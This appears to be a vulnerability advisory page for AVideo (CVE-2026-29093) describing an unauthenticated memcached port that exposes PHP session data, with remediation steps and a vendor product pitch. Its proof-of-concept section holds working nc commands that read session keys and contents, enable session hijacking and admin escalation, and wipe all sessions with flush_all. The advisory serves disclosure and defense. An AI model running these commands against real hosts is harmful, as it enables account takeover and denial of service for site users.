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GHSA-xxpw-32hf-q8v9

HIGH

AVideo: Unauthenticated PHP session store exposed to host network via published memcached port

Also known asCVE-2026-29093
Published
Mar 5, 2026
Updated
Mar 6, 2026
Affected
1 pkg
Patched
None yet
Exploits
None indexed

EPSS Exploitation Probability

via FIRST.org ↗
0.5%probability of exploitation in next 30 days
Lower Risk38th percentile+0.45%
0.00%0.33%0.66%0.99%0.1%0.0%0.0%0.5%Apr 26Jun 26Jun 26

EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.

Blast Radius

1 pkg affected
🐘wwbn/avideo

Real-time download stats are indexed for npm and PyPI packages. This vulnerability affects Packagist packages — download data is not available via public APIs for these ecosystems.

Description

Summary

The official docker-compose.yml publishes the memcached service on host port 11211 (0.0.0.0:11211) with no authentication, while the Dockerfile configures PHP to store all user sessions in that memcached instance. An attacker who can reach port 11211 can read, modify, or flush session data — enabling session hijacking, admin impersonation, and mass session destruction without any application-level authentication.

Severity

High (CVSS 3.1: 8.1)

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

  • Attack Vector: Network — docker-compose.yml binds memcached to 0.0.0.0:11211 on the host
  • Attack Complexity: High — exploitation requires port 11211 to be network-reachable, which depends on external firewall/security group configuration beyond the attacker's control
  • Privileges Required: None — memcached has no authentication mechanism enabled
  • User Interaction: None
  • Scope: Unchanged — impact is to the AVideo application's session management
  • Confidentiality Impact: High — session data includes user IDs, admin flags, email addresses, and password hashes
  • Integrity Impact: High — an attacker can modify session data to inject admin privileges or impersonate any user
  • Availability Impact: High — flush_all destroys all active sessions, forcing mass logout

Affected Component

  • docker-compose.yml — memcached service ports directive (line 203)
  • Dockerfile — PHP session configuration (lines 150-151)

CWE

  • CWE-668: Exposure of Resource to Wrong Sphere
  • CWE-287: Improper Authentication (memcached has no authentication)

Description

Memcached port unnecessarily published to host network

The docker-compose.yml publishes the memcached port to the Docker host's network interface:

# docker-compose.yml — lines 192-213
  memcached:
    image: memcached:alpine
    restart: unless-stopped
    command: >
      memcached -m 512 -c 2048 -t ${NPROC:-4} -R 200
    ports:
      - "${MEMCACHE_PORT:-11211}:11211"    # <-- Exposes to 0.0.0.0:11211
    networks:
      - app_net

The memcached command has no authentication flags:

  • No -S flag (SASL authentication)
  • No -l 127.0.0.1 flag (interface binding restriction)

The default env.example reinforces this port:

MEMCACHE_PORT=11211

PHP sessions stored entirely in memcached

The Dockerfile configures PHP to use memcached as the session store:

; Dockerfile — lines 150-151
session.save_handler           = memcached
session.save_path              = "memcached:11211?persistent=1&timeout=2&retry_interval=5"

Session data contains all authentication state

The application stores complete authentication state in sessions. From objects/user.php:

// user.php:1521 — login check
$isLogged = !empty($_SESSION['user']['id']);

// user.php:1544 — admin check
return !empty($_SESSION['user']['isAdmin']);

Session data includes: user ID, email, username, password hash, admin flag, channel name, photo URL, and email verification status (user.php lines 329-733). All of this is readable and writable via the exposed memcached port.

Inconsistent defense: database services are correctly internal-only

The docker-compose.yml demonstrates awareness of proper service isolation — both database services have NO ports: directive:

# docker-compose.yml — database service (lines 136-163)
  database:
    build:
      context: .
      dockerfile: Dockerfile.mariadb
    # ... NO ports: directive — internal only
    networks:
      - app_net

# docker-compose.yml — database_encoder service (lines 165-189)
  database_encoder:
    build:
      context: .
      dockerfile: Dockerfile.mariadb
    # ... NO ports: directive — internal only
    networks:
      - app_net

Both databases are only reachable via the internal app_net Docker network. Memcached — which stores equally sensitive session data — should follow the same pattern but does not. This inconsistency confirms the exposure is an oversight, not a design choice.

Port exposure map

ServicePorts published to hostContains sensitive dataExposure justified
avideo80, 443, 2053N/A (web server)Yes — serves web traffic
live1935, 8080, 8443N/A (streaming)Yes — serves RTMP/HLS
databaseNoneYes (all app data)Correct — internal only
database_encoderNoneYes (encoder data)Correct — internal only
memcached11211Yes (all sessions)No — should be internal only

Execution chain

  1. Attacker scans the target host and discovers port 11211 is open
  2. Attacker connects with nc TARGET 11211 or any memcached client — no authentication required
  3. Attacker runs stats items to enumerate session slab classes
  4. Attacker runs stats cachedump <slab_id> <limit> to list session keys
  5. Attacker runs get <session_key> to read serialized PHP session data containing user IDs, admin flags, and password hashes
  6. Attacker either:
    • Hijacks a session: uses the session ID as a cookie to impersonate the user
    • Escalates privileges: modifies session data to set isAdmin to true via set <session_key>
    • Performs DoS: runs flush_all to destroy all sessions

Proof of Concept

# 1. Verify memcached is reachable (returns server stats)
echo -e "stats\r" | nc TARGET 11211

# 2. Enumerate session keys
echo -e "stats items\r" | nc TARGET 11211
# Then for each slab:
echo -e "stats cachedump 1 100\r" | nc TARGET 11211

# 3. Read a session (key format: memc.sess.key.<session_id>)
echo -e "get memc.sess.key.abc123sessionid\r" | nc TARGET 11211
# Returns serialized PHP session with user data, admin flag, etc.

# 4. DoS — destroy all sessions (logs out every user)
echo -e "flush_all\r" | nc TARGET 11211

For session hijacking, extract the session ID from step 3 and set it as the PHPSESSID cookie in a browser to impersonate the victim user.

Impact

  • Session hijacking: Read any user's session data and impersonate them by reusing their session ID — including admin accounts
  • Privilege escalation: Modify session data to set $_SESSION['user']['isAdmin'] to a truthy value, granting admin access to any session
  • Credential exposure: Session data includes password hashes ($_SESSION['user']['passhash'], user.php:555) that can be cracked offline
  • Mass session destruction: flush_all destroys all active sessions, forcing every logged-in user to re-authenticate — a one-command denial of service
  • Reconnaissance: stats reveals server uptime, memory usage, connection counts, and cache hit/miss ratios

Recommended Remediation

Option 1: Remove the port mapping (preferred — one-line fix)

Memcached is only used internally by the PHP application via Docker networking. Remove the ports: directive entirely:

# docker-compose.yml — memcached service
  memcached:
    image: memcached:alpine
    restart: unless-stopped
    command: >
      memcached -m 512 -c 2048 -t ${NPROC:-4} -R 200
    # REMOVED: ports:
    #   - "${MEMCACHE_PORT:-11211}:11211"
    deploy:
      resources:
        limits:
          cpus: '1'
          memory: "4G"
        reservations:
          cpus: '0.5'
          memory: '1G'
    networks:
      - app_net

Also remove MEMCACHE_PORT=11211 from env.example since the port is no longer published.

The PHP application connects via the Docker internal hostname memcached:11211 (from session.save_path), which uses the app_net bridge network and does not require host-level port mapping.

Option 2: Bind memcached to localhost only (if host access is needed for debugging)

If host-level access to memcached is needed for debugging, bind only to the loopback interface:

    ports:
      - "127.0.0.1:${MEMCACHE_PORT:-11211}:11211"

This prevents remote access while allowing localhost:11211 connections from the Docker host.

Option 3: Enable SASL authentication (defense-in-depth)

Add SASL authentication to memcached as an additional layer:

    command: >
      memcached -m 512 -c 2048 -t ${NPROC:-4} -R 200 -S
    environment:
      MEMCACHED_USERNAME: "${MEMCACHED_USER:-avideo}"
      MEMCACHED_PASSWORD: "${MEMCACHED_PASSWORD}"

Update the PHP session configuration accordingly:

session.save_path = "PERSISTENT=myapp avideo:${MEMCACHED_PASSWORD}@memcached:11211"

Note: Option 1 alone is sufficient and should be applied immediately. Options 2 and 3 provide defense-in-depth.

Credit

This vulnerability was discovered and reported by bugbunny.ai.

Affected Packages

1 total
EcosystemPackageVulnerable rangeFix
🐘Packagistwwbn/avideoall versionsNo fix

Detection & mitigation playbook

Open-source dependency
  1. Detect

    Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for wwbn/avideo. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.

  2. Remediation status

    No patched version of wwbn/avideo has shipped for GHSA-xxpw-32hf-q8v9 yet. Where your build allows, override or pin the dependency away from the vulnerable range, and apply any maintainer-recommended mitigation.

  3. Mitigate without a patch

    If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

  4. How O3 protects you

    O3 pinpoints whether GHSA-xxpw-32hf-q8v9 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Tailored to GHSA-xxpw-32hf-q8v9. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

Frequently Asked Questions

## Summary The official `docker-compose.yml` publishes the memcached service on host port 11211 (`0.0.0.0:11211`) with no authentication, while the Dockerfile configures PHP to store all user sessions in that memcached instance. An attacker who can reach port 11211 can read, modify, or flush session data — enabling session hijacking, admin impersonation, and mass session destruction without any application-level authentication. ## Severity **High** (CVSS 3.1: 8.1) `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H` - **Attack Vector:** Network — `docker-compose.yml` binds memcached to `0.0.0.0:1
O3 Security · Impact-Aware SCA

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